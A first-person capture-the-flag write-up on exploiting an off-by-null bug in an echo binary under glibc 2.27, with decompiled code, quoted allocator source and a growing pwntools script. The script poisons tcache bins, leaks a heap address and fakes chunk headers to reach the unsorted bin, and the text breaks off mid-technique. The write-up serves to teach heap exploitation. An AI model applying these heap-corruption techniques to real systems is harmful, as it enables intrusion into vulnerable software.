
— Uh… I th- I think my voice is annoying.
— It is, and it’s your best quality.

— Rick & Morty, 3x06, Rest and Ricklaxation.

A few days ago I started a new challenge on this website which I am going to censor right away for obvious reasons. It was a really great experience so I think I’m going to post how I solved it. Because I don’t want to discourage advanced heap exploiters, I will say that this challenge had only seven solvers in approximately five years. But, since this is my first time doing a real heap challenge, I might as well take a somewhat basic perspective (mostly because that was my perspective while solving it). I haven’t read many heap writeups so I don’t really know of techniques or anything (and I expect everyone to notice it), I just did what occurred to me at the moment. Because of all this I believe this post may be a good starting point for heap beginners like me and, at the same time, interesting for advanced people. The challenge uses glibc 2.27, which I guess means something to heap folks.

Well, getting to it, we got a PIE binary, with canary (stack protector) and full RELRO. The source code for the binary is undisclosed but with IDA we can easily decompile the binary into C:

int __cdecl main(int argc, const char **argv, const char **envp)
{
    __int64 v3; // rax
    ssize_t v4; // r15
    _BYTE *v5; // rbx
    char v6; // al
    char v7; // dl
    char v9[512]; // [rsp+0h] [rbp-248h]
    char v10; // [rsp+200h] [rbp-48h]
    unsigned __int64 v11; // [rsp+208h] [rbp-40h]

    v11 = __readfsqword(0x28u);
    setvbuf(stdin, 0LL, 2, 0LL);
    setvbuf(stdout, 0LL, 2, 0LL);
    setvbuf(stderr, 0LL, 2, 0LL);
    memset(v9, 0, sizeof(v9));
    v10 = 0;
    while ( 1 )
    {
        v4 = read(0, v9, 0x200uLL);
        if ( v4 <= 0 )
            return 0;
        v5 = malloc(strlen(v9));
        if ( !v5 )
            return 0;
        if ( v4 )
        {
            v6 = v9[0];
            if ( v9[0] )
            {
                *v5 = v9[0];
                if ( v6 == 10 )
                {
                    v3 = 0LL;
                    LABEL_3:
                    v5[v3 + 1] = 0;
                }
                else
                {
                    v3 = 0LL;
                    while ( ++v3 != v4 )
                    {
                        v7 = v9[v3];
                        if ( !v7 )
                            break;
                        v5[v3] = v7;
                        if ( v7 == 10 )
                            goto LABEL_3;
                    }
                }
            }
        }
        __printf_chk(1LL, &unk_AA4, v5);
        free(v5);
    }
}

After a bit of manipulation (and maybe a bit of manhandling) I can get something a bit more intelligible:

int main(int argc, char** argv)
{
    __int64 i; // rax
    ssize_t r; // r15
    _BYTE *ptr; // rbx
    char buf[513]; // [rsp+0h] [rbp-248h]
    unsigned __int64 canary; // [rsp+208h] [rbp-40h]
    canary = __readfsqword(0x28u);

    setvbuf(stdin, 0, 2, 0);
    setvbuf(stdout, 0, 2, 0);
    setvbuf(stderr, 0, 2, 0);

    memset(buf, 0, sizeof(buf));
    buf[sizeof(buf) - 1] = '\0';

    while(1)
    {
        if((r = read(0, buf, sizeof(buf) - 1)) <= 0) return 0;
        if((ptr = malloc(strlen(buf))) == NULL) return 0;

        if(buf[0] != '\0')
        {
            ptr[0] = buf[0];
            i = 0;
            if(buf[0] != '\n')
            {
                while(++i != r)
                {
                    if(buf[i] == '\0')
                        break;
                    ptr[i] = buf[i];
                    if(buf[i] == '\n')
                    {
                        ptr[i + 1] = 0;
                        break;
                    }
                }
            }
            else
                ptr[1] = '\0';
        }
        printf("%s", ptr);
        free(ptr);
    }
}

Why hello, echo program. Roughly, what this program does is read from fd 0 into a stack buffer, allocate a chunk, copy the stack buffer into the chunk (as a string, although the null terminator is not included), print the chunk’s contents with printf() and finish the loop by freeing the chunk. No UAF, no 2free. It is important to notice that the stack buffer is initialized to nullbytes in order to prevent us from leaking any address that the glibc initialization process may have left there. It’s also worth noting the placement of a nullbyte at the buffer’s 513th byte, protecting any information that may lie beyond the end of the buffer (as if there were any).

The speed of sound is finite too (or analyzing bugs)

Off by null

So, the program copies bytes from the stack buffer to the malloc()‘ed chunk until the end of the string (i.e., until a nullbyte is found), or until all bytes read in the current request have been copied. But there is one thing that stands out to the eye: after every newline a nullbyte is added, and this is done unconditionally: even if the newline is at the very end of the chunk, the nullbyte will be placed beyond the chunk’s end. This bug is called an “off-by-null”, a special case of the off-by-one bug. Since malloc() lets the program use the next chunk’s prev_size field to store data, we can overflow from there and overwrite the least significant byte of the next chunk’s size with a NUL. This will have two effects: clear the PREV_INUSE bit and shrink the next chunk to a size that is a multiple of 0x100, if it wasn’t already.
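To make the arithmetic concrete, here is a quick sanity check (a standalone Python sketch; the 64-bit glibc layout constants are assumptions baked in, not taken from the binary):

```python
# For a 0x100 chunk, malloc() reports 0xf8 usable bytes: the data region
# runs from offset 0x10 (past prev_size and size) into the next chunk's
# prev_size field.
chunk_size    = 0x100
usable        = chunk_size - 8     # usable size borrows next prev_size
data_start    = 0x10               # data begins after the 0x10-byte header
next_size_off = chunk_size + 8     # offset of the next header's size field

# The byte written at ptr[usable] lands exactly on the next size's LSB.
assert data_start + usable == next_size_off

# Writing a NUL there shrinks a 0x1f0|PREV_INUSE size down to 0x100.
next_size = 0x1f1
next_size &= ~0xff
assert next_size == 0x100          # PREV_INUSE cleared, size now 0x100
```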

No null terminator

A nullbyte is placed in the heap chunk only after each newline (and if there is another character after that newline the nullbyte will get overwritten), so we can very easily avoid placing a null terminator in the heap chunk, which will allow us to leak information from this chunk.

Buffer not cleaned and no null terminator between requests

Between requests the buffer isn’t cleaned, and no null terminator is inserted into the stack buffer after a read is made, which makes it possible for strlen() to return a size different from the number of bytes that are actually going to be copied.

Measuring the speed of sound (or first tests)

With gef’s heap bins command it’s very easy to see that every allocation we make ends up in the tcache, and that makes sense since the maximum size we may request is 0x210 (by sending 0x200 = 512 bytes), and the tcache range goes from 0x20 up to 0x410. Let’s look at the beginning of the free() source code:

    size = chunksize (p);

    // [...]

#if USE_TCACHE
    {
        size_t tc_idx = csize2tidx (size);

        if (tcache
            && tc_idx < mp_.tcache_bins
            && tcache->counts[tc_idx] < mp_.tcache_count)
        {
            tcache_put (p, tc_idx);
            return;
        }
    }
#endif

So the tcache is the first option, and we can’t escape from it. Also, once we reserve a chunk of a certain size we are stuck with it, since from then on, every time we try to allocate that same size we will end up with that same chunk taken from the tcache, because the tcache also has priority within malloc():

#if USE_TCACHE
    /* int_free also calls request2size, be careful to not pad twice.  */
    size_t tbytes;
    checked_request2size (bytes, tbytes);
    size_t tc_idx = csize2tidx (tbytes);

    MAYBE_INIT_TCACHE ();

    if (tc_idx < mp_.tcache_bins
        && tcache
        && tcache->entries[tc_idx] != NULL)
    {
        return tcache_get (tc_idx);
    }
#endif

So we can only place chunks in the tcache, one chunk per bin. Hmmm, that seems like a brutal limitation, doesn’t it?

Let’s see how these bins are managed:

/* We overlay this structure on the user-data portion of a chunk when
   the chunk is stored in the per-thread cache.  */
typedef struct tcache_entry
{
  struct tcache_entry *next;
} tcache_entry;

They are maintained in a singly-linked, non-circular list. This also means no leak: with only one chunk in the bin, that chunk will hold just a NULL pointer (for it is the last chunk of the list and the list isn’t circular).

Better together (or linking two chunks in a tcache bin)

So we may as well examine our options here. The only thing we really have right now that can give us any advantage is the off-by-null which, as we said earlier, shrinks a size to a multiple of 0x100. Huh, we could allocate a legitimate 0x100 chunk and let it go to the tcache bin for 0x100, then allocate another chunk with a size between 0x100 and 0x200 (e.g. 0x1f0) and shrink it to 0x100, sending it also to the 0x100 tcache bin.

We now have at the beginning of this chunk a heap address begging, crying desperately for attention, and we’re gonna have to leak it. I still don’t know how we are going to use it, but I can safely assert that it will be of use. Only we have to deal first with a bit of a nuisance: in order to allocate a 0x100 chunk we need to send the program a string with a length in the interval [0x100-23, 0x100-8], which means we will, without a doubt, overwrite the first 8 bytes, where this address lives.
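That interval comes straight from malloc()’s size rounding; a small model of request2size (my own transcription for x86-64, with SIZE_SZ = 8 and MALLOC_ALIGNMENT = 0x10 assumed) confirms it:

```python
# Model of glibc's request2size on x86-64: request plus 8 header bytes,
# rounded up to a multiple of 0x10, never below MINSIZE.
def request2size(req, size_sz=8, align=0x10, minsize=0x20):
    return max((req + size_sz + align - 1) & ~(align - 1), minsize)

# All request lengths that produce a 0x100-sized chunk
reqs = [n for n in range(0x200) if request2size(n) == 0x100]
assert min(reqs) == 0x100 - 23   # 0xe9
assert max(reqs) == 0x100 - 8    # 0xf8
```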

It may be interesting to consider that doing this with a chunk of size 0x20 wouldn’t be a problem at all… with a string of one character the program would call malloc(1), which would give a chunk of size 0x20, and we’d just overwrite the least significant byte of the address. We have one little problem: 0x20 isn’t a multiple of 0x100, and we can only turn chunks’ sizes into multiples of 0x100 (because this is an off-by-null, not just any off-by-one). Heck, we could convert a chunk with size below 0x100 into one with size 0x00, but that isn’t a good idea because free() does these checks before considering the tcache:

    /* Little security check which won't hurt performance: the
       allocator never wrapps around at the end of the address space.
       Therefore we can exclude some size values which might appear
       here by accident or by "design" from some intruder.  */
    if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0)
        || __builtin_expect (misaligned_chunk (p), 0))
        malloc_printerr ("free(): invalid pointer");
    /* We know that each chunk is at least MINSIZE bytes in size or a
       multiple of MALLOC_ALIGNMENT.  */
    if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size)))
        malloc_printerr ("free(): invalid size");

So close and yet too far, like her hand…. If only I could extend mine and reach it.

When did I say that? (or leaking a heap address)

Wait, hang on a second. The while loop copies only the bytes just read(), but the allocation is performed with strlen() and, if we don’t want one, there won’t be any nullbyte placed in the stack buffer. So we can first send a 0xf8 sized string, which will just sit in the buffer. This will allocate the chunk and overwrite it, yes, but nothing will change heap-wise, considering that it will be freed right away and placed again in the tcache, linked again to the other chunk. Now we can simply send one non-null byte; strlen() will pick up the whole string (the one of length 0xf8 that is already in the buffer), but the while loop will copy only one byte, so we lose only one byte, the least significant one, which in fact doesn’t hold any information about ASLR.
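The trick is easier to see in a toy model of the program’s loop (pure Python, no binary involved; the stale pointer bytes below are made up for the example):

```python
stack = bytearray(0x201)            # zero-initialized, persists across requests

def request(data):
    stack[:len(data)] = data        # read() overwrites only the bytes sent
    alloc = stack.index(0)          # malloc(strlen(buf))
    # Pretend malloc() recycled a chunk whose first 8 bytes still hold a
    # free-list pointer (fabricated value, standing in for the heap address).
    chunk = bytearray(b"\x41\x82\xe9\xaf\x49\x56\x00\x00") + bytes(alloc - 8)
    for i in range(len(data)):      # copy loop bounded by read()'s return value
        if stack[i] == 0:
            break
        chunk[i] = stack[i]
    return alloc, bytes(chunk)

request(b"A" * 0xf8)                # pre-fill; no terminator goes into stack
alloc, chunk = request(b"A")        # now send a single byte
assert alloc == 0xf8                # strlen() still sees the old string
assert chunk[1:8] == b"\x82\xe9\xaf\x49\x56\x00\x00"  # pointer bytes intact
```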

Before I show you the script let me point out that we’re gonna have to sleep() between writes to prevent them from mixing together. We could read() each response (and make this a much more civilized conversation with both programs really in sync), but that would mean determining how much the program will print for every request… And since the program doesn’t actively prompt for data we can’t use readuntil().

from pwn import *

r = process("./binary")
deltat = .05

# Allocate 0x100 chunk (placed in 0x100 bin).
r.write(b"A" * (0x100 - 8)); sleep(deltat)
# Allocate 0x1f0 chunk (placed in 0x1f0 bin).
r.write(b"A" * (0x1f0 - 8)); sleep(deltat)
# Allocate 0x100 chunk again and overflow into the 0x1f0 one, change its size
# from 0x1f0 to 0x100. The 0x100 will be placed back into the 0x100 bin.
r.write(b"A" * (0x100 - 8 - 1) + b'\n' + b'\0'); sleep(deltat)
# Allocate 0x1f0 chunk again, when freed will be placed in _0x100_ tcache bin.
r.write(b"A" * (0x1f0 - 8)); sleep(deltat)
# Fill stack buffer with a 0x100-8 = 0xf8 sized string.
# This will allocate and free the 0x1f0 chunk, but will be placed
# back into the 0x100 tcache bin, changing nothing heap-wise.
r.write(b"A" * (0x100 - 8) + b'\0'); sleep(deltat) # Pre-fill stack buffer
r.write(b"A") # Write only one byte and leak!
leak = int.from_bytes(r.read()[-6:], "little")
print("Leak: 0x%x" % leak)

This will do the trick and earn us a heap address:

$ python x.py
[+] Starting local process './binary': pid 14053
Leak: 0x5649afe98241

Looking up the heap’s base address in the debugger, we can find the offset of the address we are leaking inside the heap:

0x5649afe98241 - 0x5649afe98000 = 0x241

And this offset will be constant across executions, so we can use it to recover the heap’s base address:

heap = leak - 0x241

I just want to point out that that 0x41 is the ‘A’ we are introducing, which is overwriting the address’ original least significant byte, but it doesn’t matter, it’s just an offset, it doesn’t contain any information, it constitutes one of the not randomized parts of the address.

Breaking free (or filling a tcache bin)

After a bit of celebration we must return to the crude reality: this was just the first item in the long and twisted checklist that binary exploitation constitutes. So… next step: we want to leak a libc address, and the tcache won’t be enough (because no tcache chunk will ever hold a pointer into the libc), so we need to break free() out of this prison. As we saw earlier, free() only puts a chunk into the tcache while the corresponding bin holds fewer than mp_.tcache_count (7 by default) chunks, so let’s fill the bin:

from pwn import *

r = process("./binary")
deltat = .05

### Fill tcache bin for 0x100 ###
log.info("Filling tcache bin 0x100")
log.info("Allocating 0x100") # First one is for free
r.write(b"A" * (0x100 - 8) + b'\0'); sleep(deltat)
for i in range(6):
    log.info("Allocating 0x%03x" % (0x1f0 - (i * 0x10)))
    r.write(b"A" * (0x1f0 - (i * 0x10) - 8) + b'\0'); sleep(deltat)
log.info("Allocating 0x100 (overflowing)")
r.write(b"A" * (0x100 - 9) + b'\n' + b'\0'); sleep(deltat)
for i in range(5):
    log.info("Allocating 0x%03x (overflowing)" % (0x1f0 - (i * 0x10)))
    r.write(b"A" * (0x1f0 - (i * 0x10) - 9) + b'\n' + b'\0'); sleep(deltat)
# Last one doesn't need to be overflowed
log.info("Allocating 0x1a0")
r.write(b"A" * (0x1a0 - 8) + b"\0"); sleep(deltat)

### Leak heap ###
r.clean()
log.info("Allocating 0x100 (leaking)")
r.write(b"A" * (0x100 - 8) + b'\0'); sleep(deltat) # Pre-fill stack buffer
r.write(b"A"); sleep(deltat)
heap = int.from_bytes(r.read()[-6:], "little") - 0xa41
log.info("Heap : 0x%06x" % heap)

We are now allocating six chunks with different sizes, otherwise we would just allocate and release the same chunk back and forth six times. Then from each one of them we overflow into the next one, changing its size field to 0x100. Once every chunk has been overflowed and freed, they will all be in the tcache bin for 0x100, filling it (the last one doesn’t need to be overflowed). Notice also that the offset of the address we leak from the heap had to be adjusted, from 0x241 to 0xa41. With gdb + gef we can check that we have indeed filled the tcache bin for 0x100:

Tcachebins[idx=14, size=0x100] count=7  ←  Chunk(addr=0x555555604c70, size=0x100, flags=)  ←  Chunk(addr=0x555555604ac0, size=0x100, flags=)  ←  Chunk(addr=0x555555604900, size=0x100, flags=)  ←  Chunk(addr=0x555555604730, size=0x100, flags=)  ←  Chunk(addr=0x555555604550, size=0x100, flags=)  ←  Chunk(addr=0x555555604360, size=0x100, flags=)  ←  Chunk(addr=0x555555604260, size=0x100, flags=PREV_INUSE)

Perfect! Look at that 7. That’s a 7 like no other I have ever seen before. This is what progress looks like: a beautiful counter showing off a breathtaking 7.
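That count lives in tcache->counts[tc_idx], and the idx=14 gef shows matches glibc’s csize2tidx macro, transcribed here as a sanity check (MINSIZE = 0x20 and MALLOC_ALIGNMENT = 0x10 assumed for x86-64):

```python
MINSIZE = 0x20
MALLOC_ALIGNMENT = 0x10

# csize2tidx: maps a chunk size to its tcache bin index.
def csize2tidx(size):
    return (size - MINSIZE + MALLOC_ALIGNMENT - 1) // MALLOC_ALIGNMENT

assert csize2tidx(0x20) == 0     # the smallest bin
assert csize2tidx(0x100) == 14   # the idx=14 reported by gef
assert csize2tidx(0x410) == 63   # last of the 64 tcache bins
```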

Unsorting things out (or placing a chunk in the unsorted bin)

Let’s just not get carried away, and see what happens when the tcache bin for a specific size is full.

#if USE_TCACHE
    {
        size_t tc_idx = csize2tidx (size);

        if (tcache
            && tc_idx < mp_.tcache_bins
            && tcache->counts[tc_idx] < mp_.tcache_count)
        {
            tcache_put (p, tc_idx);
            return;
        }
    }
#endif

    /*
        If eligible, place chunk on a fastbin so it can be found
        and used quickly in malloc.
    */

    if ((unsigned long)(size) <= (unsigned long)(get_max_fast ())
    // [...]

    /*
        Consolidate other non-mmapped chunks as they arrive.
    */

    else if (!chunk_is_mmapped(p)) {

        nextchunk = chunk_at_offset(p, size);

        /* Lightweight tests: check whether the block is already the
           top block.  */
        if (__glibc_unlikely (p == av->top))
            malloc_printerr ("double free or corruption (top)");
        /* Or whether the next chunk is beyond the boundaries of the arena.  */
        if (__builtin_expect (contiguous (av)
                              && (char *) nextchunk
                              >= ((char *) av->top + chunksize(av->top)), 0))
            malloc_printerr ("double free or corruption (out)");
        /* Or whether the block is actually not marked used.  */
        if (__glibc_unlikely (!prev_inuse(nextchunk)))
            malloc_printerr ("double free or corruption (!prev)");

        nextsize = chunksize(nextchunk);
        if (__builtin_expect (chunksize_nomask (nextchunk) <= 2 * SIZE_SZ, 0)
            || __builtin_expect (nextsize >= av->system_mem, 0))
            malloc_printerr ("free(): invalid next size (normal)");

        /* consolidate backward */
        if (!prev_inuse(p)) {
            prevsize = prev_size (p);
            size += prevsize;
            p = chunk_at_offset(p, -((long) prevsize));
            unlink(av, p, bck, fwd);
        }

        if (nextchunk != av->top) {
            /* get and clear inuse bit */
            nextinuse = inuse_bit_at_offset(nextchunk, nextsize);

            /* consolidate forward */
            if (!nextinuse) {
                unlink(av, nextchunk, bck, fwd);
                size += nextsize;
            } else
                clear_inuse_bit_at_offset(nextchunk, 0);

            /*
                Place the chunk in unsorted chunk list. Chunks are
                not placed into regular bins until after they have
                been given one chance to be used in malloc.
            */

            bck = unsorted_chunks(av);
            fwd = bck->fd;
            if (__glibc_unlikely (fwd->bk != bck))
                malloc_printerr ("free(): corrupted unsorted chunks");
            p->fd = fwd;
            p->bk = bck;
            if (!in_smallbin_range(size))
            {
                p->fd_nextsize = NULL;
                p->bk_nextsize = NULL;
            }
            bck->fd = p;
            fwd->bk = p;

            set_head(p, size | PREV_INUSE);
            set_foot(p, size);

            check_free_chunk(av, p);
        }

        /*
            If the chunk borders the current high end of memory,
            consolidate into top
        */

        else {
            size += nextsize;
            set_head(p, size | PREV_INUSE);
            av->top = p;
            check_chunk(av, p);
        }
        // [...]
    }

Ok, that’s a good percentage of all the code for free(), so let’s just go step by step.

First we have what we saw earlier: it checks how the tcache is doing. Since the bin for 0x100 is full (the tcache->counts[tc_idx] < mp_.tcache_count condition fails), nothing is done here. Next it checks whether the chunk’s size is in the fastbin range, which it isn’t (fastbin covers sizes <= 0x80), and finally whether it is mmapped, which it isn’t (we aren’t allocating sizes anywhere near big enough to trigger an mmap()). So it performs a couple more security checks, and merges the chunk with the contiguous ones if they are free. Finally, if the next contiguous chunk is not the top chunk, it inserts the chunk into the unsorted bin.

Therefore, if we now free another 0x100 sized chunk, as long as the next one isn’t the top chunk, it will be placed into the unsorted bin (since it is in the smallbin range and exceeds the fastbin size). The unsorted bin is a doubly-linked, circular list, hence this chunk will contain a couple of pointers into the libc that we can leak. But we can’t just allocate a 0x100 chunk, because it would be taken from the tcache and, when freed, just placed back into it; no, we need to repeat the same process one more time…, I know, I know, and I don’t think this is going to be the last time we use that resource. Who would have thought that an off-by-null could be so powerful.
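The pointer pair comes from the insertion code quoted above (bck = unsorted_chunks(av), a list head living inside main_arena). A toy model of that doubly-linked insertion shows why a lone unsorted chunk leaks libc:

```python
# Toy model (not glibc): the unsorted bin is circular, with its head
# living inside main_arena, which is mapped in the libc.
class Chunk:
    def __init__(self, name):
        self.name = name
        self.fd = self.bk = self   # an empty circular list points to itself

bin_head = Chunk("main_arena.unsorted")

def unsorted_insert(p):
    bck = bin_head                 # bck = unsorted_chunks (av)
    fwd = bck.fd                   # fwd = bck->fd
    assert fwd.bk is bck, "free(): corrupted unsorted chunks"
    p.fd, p.bk = fwd, bck
    bck.fd = p
    fwd.bk = p

freed = Chunk("our 0x100 chunk")
unsorted_insert(freed)
# With a single chunk in the bin, both of its list pointers reference the
# head inside main_arena: two libc addresses now sit in heap memory.
assert freed.fd is bin_head and freed.bk is bin_head
```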

from pwn import *

r = process("./binary")
deltat = .05

### Fill tcache bin for 0x100 ###
log.info("Filling tcache bin 0x100")
log.info("Allocating 0x100") # First one is for free
r.write(b"A" * (0x100 - 8) + b'\0'); sleep(deltat)
for i in range(6):
    log.info("Allocating 0x%03x" % (0x1f0 - (i * 0x10)))
    r.write(b"A" * (0x1f0 - (i * 0x10) - 8) + b'\0'); sleep(deltat)
log.info("Allocating 0x100 (overflowing)")
r.write(b"A" * (0x100 - 9) + b'\n' + b'\0'); sleep(deltat)
for i in range(5):
    log.info("Allocating 0x%03x (overflowing)" % (0x1f0 - (i * 0x10)))
    r.write(b"A" * (0x1f0 - (i * 0x10) - 9) + b'\n' + b'\0'); sleep(deltat)
# Last one doesn't need to be overflowed
log.info("Allocating 0x1a0")
r.write(b"A" * (0x1a0 - 8) + b"\0"); sleep(deltat)

### Leak heap ###
r.clean()
log.info("Allocating 0x100 (leaking)")
r.write(b"A" * (0x100 - 8) + b'\0'); sleep(deltat) # Pre-fill stack buffer
r.write(b"A"); sleep(deltat)
heap = int.from_bytes(r.read()[-6:], "little") - 0xa41
log.info("Heap : 0x%06x" % heap)

### Insert a chunk in unsorted ###
log.info("Allocating 0x20")
r.write(b"A" * (0x20 - 8) + b'\0'); sleep(deltat)
log.info("Allocating 0x110")
r.write(b"A" * (0x110 - 8) + b'\0'); sleep(deltat)
log.info("Allocating 0x20 (overflowing)")
r.write(b"A" * (0x20 - 9) + b'\n' + b'\0'); sleep(deltat)
log.info("Allocating 0x110")
r.write(b"A" * (0x110 - 8) + b'\0'); sleep(deltat)

r.interactive()

Two things: First, we need to create a chunk previous to the one we are going to place into the unsorted bin, because we need a fresh chunk to overflow from. This is because the topmost chunk right now (excluding the top chunk, obviously) is one with true size 0x1a0, but it sits in the tcache bin for 0x100. So if we wanted to overflow from it we would have to send a string of length 0x1a0, but that won’t give us that chunk, because it is placed in the 0x100 bin!

Running this script will make the program scream pretty hard: “free(): invalid next size (normal)”, and abort. What’s going on? Well, if we look again into free()’s source code

    else if (!chunk_is_mmapped(p)) {

        nextchunk = chunk_at_offset(p, size);

        /* Lightweight tests: check whether the block is already the
           top block.  */
        if (__glibc_unlikely (p == av->top))
            malloc_printerr ("double free or corruption (top)");
        /* Or whether the next chunk is beyond the boundaries of the arena.  */
        if (__builtin_expect (contiguous (av)
                              && (char *) nextchunk
                              >= ((char *) av->top + chunksize(av->top)), 0))
            malloc_printerr ("double free or corruption (out)");
        /* Or whether the block is actually not marked used.  */
        if (__glibc_unlikely (!prev_inuse(nextchunk)))
            malloc_printerr ("double free or corruption (!prev)");

        nextsize = chunksize(nextchunk);
        if (__builtin_expect (chunksize_nomask (nextchunk) <= 2 * SIZE_SZ, 0)
            || __builtin_expect (nextsize >= av->system_mem, 0))
            malloc_printerr ("free(): invalid next size (normal)");

we see that those checks really mean something and exist for a reason (and that we’ll probably have to do something ‘bout ‘em). The specific problem we are facing right now is that, by shrinking the chunk to 0x100, free() will look for the next chunk at offset 0x100, but our chunk’s true size is 0x110, so it will find whatever we placed at that position (surely 0x4141414141414141), and that clearly isn’t a valid size for a chunk (way too large).

Have you ever faked it? (or faking chunks 101)

Fair enough. We place a valid size there and we’re done, right? The next chunk is at offset 0x100, but that is measured from the headers, and we start writing 0x10 bytes beyond the header, so we need to write at offset 0x100 - 0x10 = 0xf0; the size field is 8 bytes further, so 0xf8. Now, what is a valid size? Not too big, not too small. Let’s make it the smallest possible, MINSIZE, which on 64-bit architectures is defined as 0x20. On the other hand, free() also checks that the chunk it is freeing is truly in use by making sure that the PREV_INUSE bit of the next chunk’s size is set, so we are going to place 0x21 as the fake chunk’s size.1
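As a quick check that 0x21 slips past the test we tripped earlier (a toy transcription of the nextsize check; SIZE_SZ = 8 and an initial system_mem of 0x21000 are assumptions of this sketch):

```python
SIZE_SZ = 8
system_mem = 0x21000   # typical initial heap arena size (assumed)

# Mirrors: nextsize <= 2 * SIZE_SZ || nextsize >= av->system_mem
def next_size_ok(nextsize):
    return not (nextsize <= 2 * SIZE_SZ or nextsize >= system_mem)

assert not next_size_ok(0x4141414141414141)  # leftover 'A's: rejected
assert not next_size_ok(0x10)                # below MINSIZE: rejected
assert next_size_ok(0x21)                    # our fake MINSIZE|PREV_INUSE
```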

### Insert a chunk in unsorted ###
log.info("Allocating 0x20")
r.write(b"A" * (0x20 - 8) + b'\0'); sleep(deltat)
log.info("Allocating 0x110")
# Write the minimum amount necessary to allocate this size, because we are going
# to use the NULs that are there or we're gonna end up with a size too great.
r.write(b"A" * (0x110 - 23) + b'\0'); sleep(deltat)
log.info("Allocating 0x20 (overflowing)")
r.write(b"A" * (0x20 - 9) + b'\n' + b'\0'); sleep(deltat)
log.info("Allocating 0x110")
# This will place 0x21 in the fake next size
r.write(b"A" * 0xf8 + p8(0x21) + b'\0'); sleep(deltat)

Now the program just explodes: segmentation fault. Why? With gdb we can see where it breaks:

$rax   : 0xa41414141414141  ("AAAAAAA\n"?)
$r12   : 0x0000555555604e30  →  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
$r13   : 0xf5bf1414141f0cdf
$r14   : 0xa41414141414241  ("ABAAAAA\n"?)

   0x7ffff7897cab <free+859>       mov    rax, QWORD PTR [r12-0x10]
   0x7ffff7897cb0 <free+864>       sub    r13, rax
   0x7ffff7897cb3 <free+867>       add    r14, rax
 → 0x7ffff7897cb6 <free+870>       mov    rsi, QWORD PTR [r13+0x8]

r12 points to the data zone of our chunk, and the first instruction is picking up the prev_size field from our header. r13 was pointing to our header, so decreasing it by prev_size should make it point to the header of the previous chunk, if only that prev_size were real…; unfortunately we’ve just overflowed through it into the size field, so we have 0xa41414141414141 as prev_size, hmmm that can’t be healthy. It then dereferences r13 trying to access the previous chunk’s size, which obviously segfaults. What is happening exactly? Why is this happening to me?

Why does it happen to me, I dunno, but this is what’s happening exactly:

        /* consolidate backward */
        if (!prev_inuse(p)) {
            prevsize = prev_size (p);
            size += prevsize;
            p = chunk_at_offset(p, -((long) prevsize));
            unlink(av, p, bck, fwd);
        }

By overwriting the least significant byte of our chunk’s size with a NUL we marked the previous one as free, and thus free() tries to merge them. But what is the problem? The previous chunk is free for real, I promise! The problem is that when a tcache chunk (or fastbin chunk) is freed, free() doesn’t write its size into the prev_size field of the next one; it also doesn’t clear the PREV_INUSE bit in the size of the next one, precisely to avoid this exact situation. We could just place the size of the previous chunk in our prev_size after overflowing, something like this

### Insert a chunk in unsorted ###
log.info("Allocating 0x20")
r.write(b"A" * (0x20 - 8) + b'\0'); sleep(deltat)
log.info("Allocating 0x110")
# Write the minimum amount necessary to allocate this size, because we are going
# to use the NULs that are there or we're gonna end up with a size too great.
r.write(b"A" * (0x110 - 23) + b'\0'); sleep(deltat)
log.info("Allocating 0x20 (overflowing)")
r.write(b"A" * (0x20 - 9) + b'\n' + b'\0'); sleep(deltat)
log.info("Allocating 0x20 (placing nulls)")
r.write(b"A" * (0x20 - 10) + b'\n' + b'\0'); sleep(deltat)
r.write(b"A" * (0x20 - 11) + b'\n' + b'\0'); sleep(deltat)
r.write(b"A" * (0x20 - 12) + b'\n' + b'\0'); sleep(deltat)
r.write(b"A" * (0x20 - 13) + b'\n' + b'\0'); sleep(deltat)
r.write(b"A" * (0x20 - 14) + b'\n' + b'\0'); sleep(deltat)
r.write(b"A" * (0x20 - 15) + b'\n' + b'\0'); sleep(deltat)
r.write(b"A" * (0x20 - 16) + b'\n' + b'\0'); sleep(deltat)
r.write(b"A" * (0x20 - 16) + p8(0x20) + b'\0'); sleep(deltat)
log.info("Allocating 0x110")
# This will place 0x21 in the fake next size
r.write(b"A" * 0xf8 + p8(0x21) + b'\0'); sleep(deltat)

but now we break only a bit later, because it’s dereferencing the fwd pointer of the previous chunk, and it just seems that these problems are never going to end (my life is exactly the same but, I can’t do anything about it), so we’d better just pause for a second and analyze the situation. Let’s see how unlink() works (I’ll remove the largebin part because it doesn’t apply to us).

/* Take a chunk off a bin list */
#define unlink(AV, P, BK, FD) {                                            \
    if (__builtin_expect (chunksize(P) != prev_size (next_chunk(P)), 0))      \
        malloc_printerr ("corrupted size vs. prev_size");                     \
    FD = P->fd;                                                               \
    BK = P->bk;                                                               \
    if (__builtin_expect (FD->bk != P || BK->fd != P, 0))                     \
        malloc_printerr ("corrupted double-linked list");                     \
    else {                                                                    \
        FD->bk = BK;                                                          \
        BK->fd = FD;                                                          \
        if (!in_smallbin_range (chunksize_nomask (P))                         \
            // [...]
    }                                                                         \
}

Well, it seems like we are going to have to put our hands to work and create one hell of a chunk, with valid pointers that point to other chunks that point to our fake one and all. Well, we have a heap leak, that must be enough (told ya we would use it), but first we need to develop a primitive to write data to a chunk with as many nullbytes as we want. This is gonna be cool.
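Concretely, the macro above demands that our fake chunk’s fd and bk each point to a chunk whose bk/fd point straight back. A tiny model of that safe-unlinking check (plain Python, no heap involved):

```python
# Model of unlink()'s "corrupted double-linked list" check: FD->bk and
# BK->fd must both point back at the chunk being unlinked.
class Chunk:
    def __init__(self):
        self.fd = self.bk = None

def unlink_ok(p):
    return p.fd.bk is p and p.bk.fd is p

fake, neighbour = Chunk(), Chunk()
fake.fd = fake.bk = neighbour
neighbour.fd = neighbour.bk = fake   # consistent: both point back at fake
assert unlink_ok(fake)

neighbour.bk = neighbour             # break one back-pointer...
assert not unlink_ok(fake)           # ..."corrupted double-linked list"
```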

I’ll say whatever I want (or how to place nil bytes, just ‘cause nihilism)

Let’s say we want to write (with ‘0’ denoting nullbytes)

AAAAAA00BBBBBB0CCC

After filling up the stack buffer with a string as long as the chunk we want to write into, we write padding that covers everything up to and including the position of the last nullbyte, followed by the rest of the data.

AAAAAA00BBBBBB0CCC (what we want to write)
XXXXXXXXXXXXXXXCCC (what we write in the 1st step)

Now we place the nullbyte where we want it with a newline (denoted by ‘n’)

AAAAAA00BBBBBB0CCC (what we want to write)
XXXXXXXXXXXXXXXCCC (what we currently have in the chunk)
XXXXXXXXXXXXXn     (what we write in the 2nd step)
XXXXXXXXXXXXXn0CCC (what we have in the chunk after this step)

